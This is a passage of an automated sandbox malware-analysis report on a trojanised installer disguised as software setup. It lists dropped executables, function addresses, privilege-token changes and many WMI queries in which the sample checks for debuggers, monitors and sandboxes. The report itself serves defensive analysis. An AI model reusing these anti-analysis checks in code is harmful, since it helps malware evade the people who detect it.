              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_01077B3010_2_01077B30
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_01083A2010_2_01083A20
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_01087AE010_2_01087AE0
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_01083D4010_2_01083D40
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_0107FCA910_2_0107FCA9
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_01093F7010_2_01093F70
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_0101FF7C10_2_0101FF7C
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_0040BA1017_2_0040BA10
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_00447FB017_2_00447FB0
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_0040104017_2_00401040
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_0044604017_2_00446040
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_0041A85517_2_0041A855
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_0044681017_2_00446810
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_0041002017_2_00410020
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_0043283017_2_00432830
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_004328D017_2_004328D0
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_004298F017_2_004298F0
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_004388A017_2_004388A0
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_004400A017_2_004400A0
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_0042F15617_2_0042F156
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_0043616217_2_00436162
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_0044617017_2_00446170
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_0044310017_2_00443100
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_0043290E17_2_0043290E
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_0044411517_2_00444115
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_0041391317_2_00413913
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_0043291D17_2_0043291D
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_004089D017_2_004089D0
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_004349E017_2_004349E0
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_0041099017_2_00410990
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_0040A1A017_2_0040A1A0
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_004201AB17_2_004201AB
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_004381BB17_2_004381BB
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_0040CA4017_2_0040CA40
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_0043AA4017_2_0043AA40
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_0044725017_2_00447250
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_00445A5217_2_00445A52
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_0042126017_2_00421260
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_0042921017_2_00429210
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_0044623017_2_00446230
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_00433ADD17_2_00433ADD
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_0042C2E017_2_0042C2E0
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_00446AE017_2_00446AE0
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_004462F017_2_004462F0
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_00440A8017_2_00440A80
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_00402AB017_2_00402AB0
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_00421AB017_2_00421AB0
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_0041535E17_2_0041535E
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_0040E36017_2_0040E360
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_0040EB0017_2_0040EB00
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_0041CB1117_2_0041CB11
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_0043EB1017_2_0043EB10
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_0043F32017_2_0043F320
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_0043C33817_2_0043C338
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_004093C017_2_004093C0
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_004503DE17_2_004503DE
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_004403E017_2_004403E0
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_004363F817_2_004363F8
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_0042638017_2_00426380
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_0043339617_2_00433396
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_0041ABA117_2_0041ABA1
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_00429BA017_2_00429BA0
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_0041FBB017_2_0041FBB0
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_0042C3BD17_2_0042C3BD
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_00438C4017_2_00438C40
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_00424C6017_2_00424C60
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_004034C017_2_004034C0
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_00437CC117_2_00437CC1
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_00407CF017_2_00407CF0
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_0043ACF017_2_0043ACF0
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_0042D48E17_2_0042D48E
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_0041B4A417_2_0041B4A4
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_0043D4B217_2_0043D4B2
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_00429D5017_2_00429D50
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_0043ED7017_2_0043ED70
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_00421D1017_2_00421D10
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_0042CD1617_2_0042CD16
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_00429D2E17_2_00429D2E
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_00419D3C17_2_00419D3C
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_004475C017_2_004475C0
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_0043DD8B17_2_0043DD8B
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_0041DD9017_2_0041DD90
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_0040C5A017_2_0040C5A0
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_004215A017_2_004215A0
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_004235B017_2_004235B0
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_00408E4017_2_00408E40
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_0043F64017_2_0043F640
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_0041C65D17_2_0041C65D
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_00403E6017_2_00403E60
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_00415E7017_2_00415E70
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_00435E0317_2_00435E03
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_0043160017_2_00431600
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_0041160517_2_00411605
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_004336C217_2_004336C2
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_00431ED017_2_00431ED0
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_0043C6D017_2_0043C6D0
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_00446EE017_2_00446EE0
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_00439EF417_2_00439EF4
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_00425E8017_2_00425E80
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_004206A017_2_004206A0
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_0041BF4317_2_0041BF43
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_00427F6B17_2_00427F6B
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_00420F0017_2_00420F00
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_0042BF1017_2_0042BF10
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_0044271017_2_00442710
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_00443F2217_2_00443F22
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_0042B7C817_2_0042B7C8
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_00418FD717_2_00418FD7
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_004127E017_2_004127E0
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_00411FF717_2_00411FF7
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_0041B7A517_2_0041B7A5
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 22_2_004503DE22_2_004503DE
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 22_2_03FB7E0022_2_03FB7E00
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 22_2_03FCD72922_2_03FCD729
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 22_2_03FC1AC022_2_03FC1AC0
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 22_2_03FBF67022_2_03FBF670
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 22_2_03FC115022_2_03FC1150
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\is-QC304.tmp\_isetup\_setup64.tmp 388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeProcess token adjusted: SecurityJump to behavior
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: String function: 00418F30 appears 102 times
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: String function: 0040B190 appears 53 times
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: String function: 010950F0 appears 743 times
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: String function: 00FF1DFC appears 37 times
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: String function: 00FF1E30 appears 159 times
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: String function: 00FF2A44 appears 47 times
              Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
              Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
              Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp.3.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
              Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp.3.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
              Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exe, 00000000.00000003.1262551658.0000000002308000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamekernel32j% vs Magic_V_pro_setup_stable_latest_release_version_9_709.exe
              Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exe, 00000000.00000000.1184924740.00000000004B8000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileName vs Magic_V_pro_setup_stable_latest_release_version_9_709.exe
              Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exe, 00000000.00000003.1188417484.00000000024E0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs Magic_V_pro_setup_stable_latest_release_version_9_709.exe
              Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exe, 00000000.00000003.1188850208.000000007F2B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs Magic_V_pro_setup_stable_latest_release_version_9_709.exe
              Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exe, 00000003.00000003.1453721155.0000000002268000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamekernel32j% vs Magic_V_pro_setup_stable_latest_release_version_9_709.exe
              Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exeBinary or memory string: OriginalFileName vs Magic_V_pro_setup_stable_latest_release_version_9_709.exe
              Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: willrandom.exe.10.drStatic PE information: Section: pb ZLIB complexity 1.021484375
              Source: classification engineClassification label: mal64.troj.evad.winEXE@23/12@4/4
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_0100458B __EH_prolog,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,10_2_0100458B
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_00FF9749 _fileno,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,10_2_00FF9749
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_00FF96A5 DeviceIoControl,GetDiskFreeSpaceExW,GetDiskFreeSpaceW,10_2_00FF96A5
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_004349E0 CoCreateInstance,17_2_004349E0
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpFile created: C:\Users\user\AppData\Local\ProgramsJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7664:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7732:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7604:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7804:120:WilError_03
              Source: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exeFile created: C:\Users\user\AppData\Local\Temp\is-3LF26.tmpJump to behavior
              Source: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="systeminformer.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="idaq64.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="filemon.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="procmon.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="tcpview.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="processhacker.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="joeboxserver.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="cain.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="wsbroker.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="x32dbg.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="shade.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="xenservice.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="lordpe.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="proc_analyzer.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="bitbox.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="autoruns.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="apimonitor.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="regmon.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="ollydbg.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="x64dbg.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="hookexplorer.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="dumpcap.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="fiddler.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="windbg.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="ida.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="procexp.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="idaq.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="sysmon.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="httpanalyzerstdv7.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="wireshark.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="netstat.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="docker.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="httpdebuggerui.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="firejail.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="comodosandbox.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="sysanalyzer.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="cuckoo.exe"
